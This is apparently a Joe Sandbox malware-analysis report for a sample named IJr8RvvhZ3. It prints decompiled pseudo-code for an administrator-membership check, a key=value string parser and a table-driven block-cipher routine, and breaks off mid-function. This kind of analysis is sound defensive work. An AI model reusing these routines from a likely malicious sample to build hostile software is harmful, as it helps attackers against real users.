Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$BinaryCryptFreeStringlstrlen
String ID:
API String ID: 2885909284-0
Opcode ID: 4b577a2fca5175dc817a5f0a822f0b1f2b1b2ce44ebef64a106c43ffda3d23e6
Instruction ID: f5b68047144edc6014334e46e75f4d35dd78ef74ad5e526f4ecfaf4aeb28bad9
Opcode Fuzzy Hash: 4b577a2fca5175dc817a5f0a822f0b1f2b1b2ce44ebef64a106c43ffda3d23e6
Instruction Fuzzy Hash: 4321C375A803187BEB119EA48C41F9ABFACEF85750F110065F604EB281D7B57A518B90

Uniqueness

Uniqueness Score: -1.00%

Function 0F143C70 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0F143C70() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}

0x0f143c79
0x0f143c99
0x0f143ca0
0x0f143ca8
0x0f143cbf
0x0f143cce
0x0f143cd5
0x0f143cd7
0x0f143cda
0x0f143ce6
0x0f143cad
0x0f143cad
0x0f143cad

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F143CA0
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0F143CB3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0F143CBF
FreeSid.ADVAPI32(?), ref: 0F143CDA

Strings

CheckTokenMembership, xrefs: 0F143CB9
advapi32.dll, xrefs: 0F143CAE

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 3309497720-1888249752
Opcode ID: 74052795d49f511dfe6d4eac2ceb188cc5887e84c29efce99224ec00973fe53b
Instruction ID: e10ec616be18126487a1a478f41c33cdc83980dfb08f2d1041887518e7b17b19
Opcode Fuzzy Hash: 74052795d49f511dfe6d4eac2ceb188cc5887e84c29efce99224ec00973fe53b
Instruction Fuzzy Hash: 67F04F34A80309BBEF00DFE4DC0AFAD7778EF44716F000594F900A6281E77576688B51

Uniqueness

Uniqueness Score: -1.00%

Function 0F143200 Relevance: 8.8, APIs: 7, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F143200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

0x0f143205
0x0f143208
0x0f14320a
0x0f14320e
0x0f14321f
0x0f14321f
0x0f143223
0x00000000
0x0f143225
0x0f143226
0x0f14322a
0x0f143230
0x0f143235
0x0f143239
0x00000000
0x00000000
0x0f14323b
0x00000000
0x0f143239
0x0f143245
0x0f143245
0x0f143248
0x0f143248
0x0f14324e
0x0f143270
0x0f143273
0x0f143284
0x0f14328a
0x00000000
0x0f14328a
0x0f143250
0x0f143251
0x0f143262
0x0f143268
0x0f14328d
0x0f14328f
0x0f143293
0x0f143293
0x0f14328f
0x0f143299
0x0f1432a5
0x0f1432a5
0x0f143210
0x0f143210
0x0f143214
0x0f143217
0x00000000
0x0f143219
0x0f143219
0x0f14321d
0x00000000
0x00000000
0x00000000
0x00000000
0x0f14321d
0x00000000
0x0f143217
0x0f14323e
0x0f143242
0x0f143242
0x00000000

APIs

lstrlenA.KERNEL32(0F145444,00000000,?,0F145445,?,0F1434BF,0F145445,00000001,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F143251
GetProcessHeap.KERNEL32(00000008,00000001,?,0F1434BF,0F145445,00000001,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F14325B
HeapAlloc.KERNEL32(00000000,?,0F1434BF,0F145445,00000001,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F143262
lstrlenA.KERNEL32(0F145444,00000000,?,0F145445,?,0F1434BF,0F145445,00000001,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F143273
GetProcessHeap.KERNEL32(00000008,00000001,?,0F1434BF,0F145445,00000001,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F14327D
HeapAlloc.KERNEL32(00000000,?,0F1434BF,0F145445,00000001,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F143284
lstrcpyA.KERNEL32(00000000,0F145444,?,0F1434BF,0F145445,00000001,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F143293

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID:
API String ID: 511007297-0
Opcode ID: 1d56711c4b3325411edfb7f2f3cb804a4f3febb5d0086898d72788b1c624637e
Instruction ID: 517051ff16c0f5fce1ccb1d632c3f25dd75ff1df29530cf7c28456a03545282d
Opcode Fuzzy Hash: 1d56711c4b3325411edfb7f2f3cb804a4f3febb5d0086898d72788b1c624637e
Instruction Fuzzy Hash: 6011B9344441956FEB110F689408FA67B68FF82761F544119F8E5CB242C739B4B69B61

Uniqueness

Uniqueness Score: -1.00%

Function 0F141C20 Relevance: .7, Instructions: 721
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0F141C20(signed int* __ebx, signed int* __edi, signed int* __esi) {
				signed int _t514;
				signed char _t522;
				signed char _t530;
				signed char _t538;
				signed char _t546;
				signed char _t554;
				signed char _t562;
				signed char _t570;
				signed char _t578;
				signed char _t586;
				void* _t595;
				signed char _t603;
				signed char _t618;
				signed int _t628;
				signed char _t630;
				signed char _t631;
				signed char _t633;
				signed char _t635;
				signed char _t636;
				signed char _t638;
				signed char _t640;
				signed char _t641;
				signed char _t643;
				signed char _t645;
				signed char _t646;
				signed char _t648;
				signed char _t650;
				signed char _t651;
				signed char _t653;
				signed char _t655;
				signed char _t656;
				signed char _t658;
				signed char _t660;
				signed char _t661;
				signed char _t663;
				signed char _t665;
				signed char _t666;
				signed char _t668;
				signed char _t670;
				signed char _t671;
				signed char _t673;
				signed char _t675;
				signed char _t676;
				signed char _t681;
				signed char _t682;
				signed char _t684;
				signed char _t686;
				signed char _t687;
				signed char _t690;
				signed char _t691;
				signed char _t693;
				signed char _t695;
				signed char _t696;
				signed int _t699;
				signed char _t700;
				signed char _t708;
				signed char _t709;
				signed char _t717;
				signed char _t718;
				signed char _t726;
				signed char _t727;
				signed char _t735;
				signed char _t736;
				signed char _t744;
				signed char _t745;
				signed char _t753;
				signed char _t754;
				signed char _t762;
				signed char _t763;
				signed char _t771;
				signed char _t772;
				signed char _t780;
				signed char _t781;
				signed char _t789;
				signed char _t797;
				signed char _t798;
				signed char _t806;
				signed char _t814;
				signed char _t815;
				signed int _t824;
				signed char _t825;
				signed char _t826;
				signed char _t827;
				signed char _t828;
				signed char _t829;
				signed char _t830;
				signed char _t831;
				signed char _t832;
				signed char _t833;
				signed char _t834;
				signed char _t835;
				signed char _t836;
				signed char _t837;
				signed char _t838;
				signed char _t839;
				signed char _t840;
				signed char _t841;
				signed char _t842;
				signed char _t843;
				signed char _t844;
				signed char _t845;
				signed char _t846;
				signed char _t847;
				signed char _t848;
				signed char _t849;
				signed int _t851;
				signed int* _t924;
				signed int* _t997;
				signed int* _t998;
				signed int* _t999;
				signed int* _t1011;
				signed int* _t1012;
				signed int* _t1024;
				signed int* _t1025;
				signed int* _t1037;
				signed int* _t1038;
				signed int* _t1050;
				signed int* _t1051;
				signed int* _t1063;
				signed int* _t1064;
				signed int* _t1076;
				signed int* _t1077;
				signed int* _t1089;
				signed int* _t1090;
				signed int* _t1102;
				signed int* _t1103;
				signed int* _t1115;
				signed int* _t1116;
				signed int* _t1128;
				signed int* _t1129;
				signed int* _t1131;
				signed int* _t1143;
				signed int* _t1144;
				signed int* _t1156;
				signed int* _t1168;
				signed int* _t1169;
				signed int** _t1181;

				_t1181[4] = _t997;
				_t1181[3] = __ebx;
				_t1181[2] = __esi;
				_t1181[1] = __edi;
				_t924 = _t1181[6];
				_t998 = _t1181[8];
				_t851 = _t998[0x3c] & 0x000000ff;
				_t514 =  *_t924 ^  *_t998;
				_t628 = _t924[1] ^ _t998[1];
				_t699 = _t924[2] ^ _t998[2];
				_t824 = _t924[3] ^ _t998[3];
				if(_t851 == 0xa0) {
					L6:
					_t999 =  &(_t998[4]);
					 *_t1181 = _t999;
					asm("rol eax, 0x10");
					_t630 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
					_t700 = _t699 >> 0x10;
					_t631 = _t630 >> 0x10;
					_t825 = _t824 >> 0x10;
					_t708 = _t999[2] ^  *(0xf14c240 + (_t699 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t628 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t514 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t825 & 0x000000ff) * 4);
					_t826 = _t999[3] ^  *(0xf14c240 + (_t824 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t699 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t514 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t631 & 0x000000ff) * 4);
					_t1011 =  *_t1181;
					_t522 =  *(0xf14ca40 + (_t700 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t630 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t824 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t631 & 0x000000ff) * 4) ^  *_t1011;
					_t633 =  *(0xf14c240 + (_t628 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t630 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t700 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t825 & 0x000000ff) * 4) ^ _t1011[1];
					_t1012 =  &(_t1011[4]);
					 *_t1181 = _t1012;
					asm("rol eax, 0x10");
					_t635 = _t633 & 0xffff0000 | _t522 >> 0x00000010;
					_t709 = _t708 >> 0x10;
					_t636 = _t635 >> 0x10;
					_t827 = _t826 >> 0x10;
					_t717 = _t1012[2] ^  *(0xf14c240 + (_t708 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t633 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t522 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t827 & 0x000000ff) * 4);
					_t828 = _t1012[3] ^  *(0xf14c240 + (_t826 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t708 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t522 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t636 & 0x000000ff) * 4);
					_t1024 =  *_t1181;
					_t530 =  *(0xf14ca40 + (_t709 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t635 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t826 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t636 & 0x000000ff) * 4) ^  *_t1024;
					_t638 =  *(0xf14c240 + (_t633 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t635 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t709 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t827 & 0x000000ff) * 4) ^ _t1024[1];
					_t1025 =  &(_t1024[4]);
					 *_t1181 = _t1025;
					asm("rol eax, 0x10");
					_t640 = _t638 & 0xffff0000 | _t530 >> 0x00000010;
					_t718 = _t717 >> 0x10;
					_t641 = _t640 >> 0x10;
					_t829 = _t828 >> 0x10;
					_t726 = _t1025[2] ^  *(0xf14c240 + (_t717 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t638 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t530 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t829 & 0x000000ff) * 4);
					_t830 = _t1025[3] ^  *(0xf14c240 + (_t828 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t717 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t530 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t641 & 0x000000ff) * 4);
					_t1037 =  *_t1181;
					_t538 =  *(0xf14ca40 + (_t718 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t640 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t828 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t641 & 0x000000ff) * 4) ^  *_t1037;
					_t643 =  *(0xf14c240 + (_t638 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t640 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t718 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t829 & 0x000000ff) * 4) ^ _t1037[1];
					_t1038 =  &(_t1037[4]);
					 *_t1181 = _t1038;
					asm("rol eax, 0x10");
					_t645 = _t643 & 0xffff0000 | _t538 >> 0x00000010;
					_t727 = _t726 >> 0x10;
					_t646 = _t645 >> 0x10;
					_t831 = _t830 >> 0x10;
					_t735 = _t1038[2] ^  *(0xf14c240 + (_t726 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t643 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t538 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t831 & 0x000000ff) * 4);
					_t832 = _t1038[3] ^  *(0xf14c240 + (_t830 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t726 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t538 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t646 & 0x000000ff) * 4);
					_t1050 =  *_t1181;
					_t546 =  *(0xf14ca40 + (_t727 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t645 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t830 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t646 & 0x000000ff) * 4) ^  *_t1050;
					_t648 =  *(0xf14c240 + (_t643 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t645 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t727 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t831 & 0x000000ff) * 4) ^ _t1050[1];
					_t1051 =  &(_t1050[4]);
					 *_t1181 = _t1051;
					asm("rol eax, 0x10");
					_t650 = _t648 & 0xffff0000 | _t546 >> 0x00000010;
					_t736 = _t735 >> 0x10;
					_t651 = _t650 >> 0x10;
					_t833 = _t832 >> 0x10;
					_t744 = _t1051[2] ^  *(0xf14c240 + (_t735 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t648 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t546 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t833 & 0x000000ff) * 4);
					_t834 = _t1051[3] ^  *(0xf14c240 + (_t832 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t735 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t546 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t651 & 0x000000ff) * 4);
					_t1063 =  *_t1181;
					_t554 =  *(0xf14ca40 + (_t736 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t650 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t832 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t651 & 0x000000ff) * 4) ^  *_t1063;
					_t653 =  *(0xf14c240 + (_t648 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t650 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t736 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t833 & 0x000000ff) * 4) ^ _t1063[1];
					_t1064 =  &(_t1063[4]);
					 *_t1181 = _t1064;
					asm("rol eax, 0x10");
					_t655 = _t653 & 0xffff0000 | _t554 >> 0x00000010;
					_t745 = _t744 >> 0x10;
					_t656 = _t655 >> 0x10;
					_t835 = _t834 >> 0x10;
					_t753 = _t1064[2] ^  *(0xf14c240 + (_t744 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t653 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t554 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t835 & 0x000000ff) * 4);
					_t836 = _t1064[3] ^  *(0xf14c240 + (_t834 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t744 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t554 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t656 & 0x000000ff) * 4);
					_t1076 =  *_t1181;
					_t562 =  *(0xf14ca40 + (_t745 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t655 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t834 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t656 & 0x000000ff) * 4) ^  *_t1076;
					_t658 =  *(0xf14c240 + (_t653 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t655 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t745 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t835 & 0x000000ff) * 4) ^ _t1076[1];
					_t1077 =  &(_t1076[4]);
					 *_t1181 = _t1077;
					asm("rol eax, 0x10");
					_t660 = _t658 & 0xffff0000 | _t562 >> 0x00000010;
					_t754 = _t753 >> 0x10;
					_t661 = _t660 >> 0x10;
					_t837 = _t836 >> 0x10;
					_t762 = _t1077[2] ^  *(0xf14c240 + (_t753 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t658 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t562 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t837 & 0x000000ff) * 4);
					_t838 = _t1077[3] ^  *(0xf14c240 + (_t836 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t753 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t562 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t661 & 0x000000ff) * 4);
					_t1089 =  *_t1181;
					_t570 =  *(0xf14ca40 + (_t754 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t660 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t836 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t661 & 0x000000ff) * 4) ^  *_t1089;
					_t663 =  *(0xf14c240 + (_t658 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t660 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t754 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t837 & 0x000000ff) * 4) ^ _t1089[1];
					_t1090 =  &(_t1089[4]);
					 *_t1181 = _t1090;
					asm("rol eax, 0x10");
					_t665 = _t663 & 0xffff0000 | _t570 >> 0x00000010;
					_t763 = _t762 >> 0x10;
					_t666 = _t665 >> 0x10;
					_t839 = _t838 >> 0x10;
					_t771 = _t1090[2] ^  *(0xf14c240 + (_t762 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t663 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t570 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t839 & 0x000000ff) * 4);
					_t840 = _t1090[3] ^  *(0xf14c240 + (_t838 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t762 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t570 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t666 & 0x000000ff) * 4);
					_t1102 =  *_t1181;
					_t578 =  *(0xf14ca40 + (_t763 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t665 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t838 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t666 & 0x000000ff) * 4) ^  *_t1102;
					_t668 =  *(0xf14c240 + (_t663 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t665 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t763 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t839 & 0x000000ff) * 4) ^ _t1102[1];
					_t1103 =  &(_t1102[4]);
					 *_t1181 = _t1103;
					asm("rol eax, 0x10");
					_t670 = _t668 & 0xffff0000 | _t578 >> 0x00000010;
					_t772 = _t771 >> 0x10;
					_t671 = _t670 >> 0x10;
					_t841 = _t840 >> 0x10;
					_t780 = _t1103[2] ^  *(0xf14c240 + (_t771 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t668 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t578 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t841 & 0x000000ff) * 4);
					_t842 = _t1103[3] ^  *(0xf14c240 + (_t840 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t771 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t578 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t671 & 0x000000ff) * 4);
					_t1115 =  *_t1181;
					_t586 =  *(0xf14ca40 + (_t772 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t670 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t840 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t671 & 0x000000ff) * 4) ^  *_t1115;
					_t673 =  *(0xf14c240 + (_t668 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t670 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t772 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t841 & 0x000000ff) * 4) ^ _t1115[1];
					_t1116 =  &(_t1115[4]);
					 *_t1181 = _t1116;
					asm("rol eax, 0x10");
					_t675 = _t673 & 0xffff0000 | _t586 >> 0x00000010;
					_t781 = _t780 >> 0x10;
					_t676 = _t675 >> 0x10;
					_t843 = _t842 >> 0x10;
					_t1128 =  *_t1181;
					_t1129 = _t1181[7];
					 *_t1129 =  *(0xf14da40 + (_t781 & 0x000000ff) * 4) ^  *(0xf14d240 + (_t675 & 0x000000ff) * 4) ^  *(0xf14d640 + (_t842 & 0x000000ff) * 4) ^  *(0xf14de40 + (_t676 & 0x000000ff) * 4) ^  *_t1128;
					_t1129[1] =  *(0xf14d240 + (_t673 & 0x000000ff) * 4) ^  *(0xf14d640 + (_t675 & 0x000000ff) * 4) ^  *(0xf14de40 + (_t781 & 0x000000ff) * 4) ^  *(0xf14da40 + (_t843 & 0x000000ff) * 4) ^ _t1128[1];
					_t1129[2] = _t1116[2] ^  *(0xf14d240 + (_t780 & 0x000000ff) * 4) ^  *(0xf14d640 + (_t673 & 0x000000ff) * 4) ^  *(0xf14da40 + (_t586 & 0x000000ff) * 4) ^  *(0xf14de40 + (_t843 & 0x000000ff) * 4);
					_t1129[3] = _t1116[3] ^  *(0xf14d240 + (_t842 & 0x000000ff) * 4) ^  *(0xf14d640 + (_t780 & 0x000000ff) * 4) ^  *(0xf14de40 + (_t586 & 0x000000ff) * 4) ^  *(0xf14da40 + (_t676 & 0x000000ff) * 4);
					_t595 = 0;
				} else {
					if(_t851 == 0xc0) {
						L5:
						_t1131 =  &(_t998[4]);
						 *_t1181 = _t1131;
						asm("rol eax, 0x10");
						_t681 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
						_t789 = _t699 >> 0x10;
						_t682 = _t681 >> 0x10;
						_t844 = _t824 >> 0x10;
						_t797 = _t1131[2] ^  *(0xf14c240 + (_t699 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t628 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t514 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t844 & 0x000000ff) * 4);
						_t845 = _t1131[3] ^  *(0xf14c240 + (_t824 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t699 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t514 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t682 & 0x000000ff) * 4);
						_t1143 =  *_t1181;
						_t603 =  *(0xf14ca40 + (_t789 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t681 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t824 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t682 & 0x000000ff) * 4) ^  *_t1143;
						_t684 =  *(0xf14c240 + (_t628 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t681 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t789 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t844 & 0x000000ff) * 4) ^ _t1143[1];
						_t1144 =  &(_t1143[4]);
						 *_t1181 = _t1144;
						asm("rol eax, 0x10");
						_t686 = _t684 & 0xffff0000 | _t603 >> 0x00000010;
						_t798 = _t797 >> 0x10;
						_t687 = _t686 >> 0x10;
						_t846 = _t845 >> 0x10;
						_t699 = _t1144[2] ^  *(0xf14c240 + (_t797 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t684 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t603 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t846 & 0x000000ff) * 4);
						_t824 = _t1144[3] ^  *(0xf14c240 + (_t845 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t797 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t603 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t687 & 0x000000ff) * 4);
						_t998 =  *_t1181;
						_t514 =  *(0xf14ca40 + (_t798 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t686 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t845 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t687 & 0x000000ff) * 4) ^  *_t998;
						_t628 =  *(0xf14c240 + (_t684 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t686 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t798 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t846 & 0x000000ff) * 4) ^ _t998[1];
						goto L6;
					} else {
						if(_t851 == 0xe0) {
							_t1156 =  &(_t998[4]);
							 *_t1181 = _t1156;
							asm("rol eax, 0x10");
							_t690 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
							_t806 = _t699 >> 0x10;
							_t691 = _t690 >> 0x10;
							_t847 = _t824 >> 0x10;
							_t814 = _t1156[2] ^  *(0xf14c240 + (_t699 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t628 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t514 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t847 & 0x000000ff) * 4);
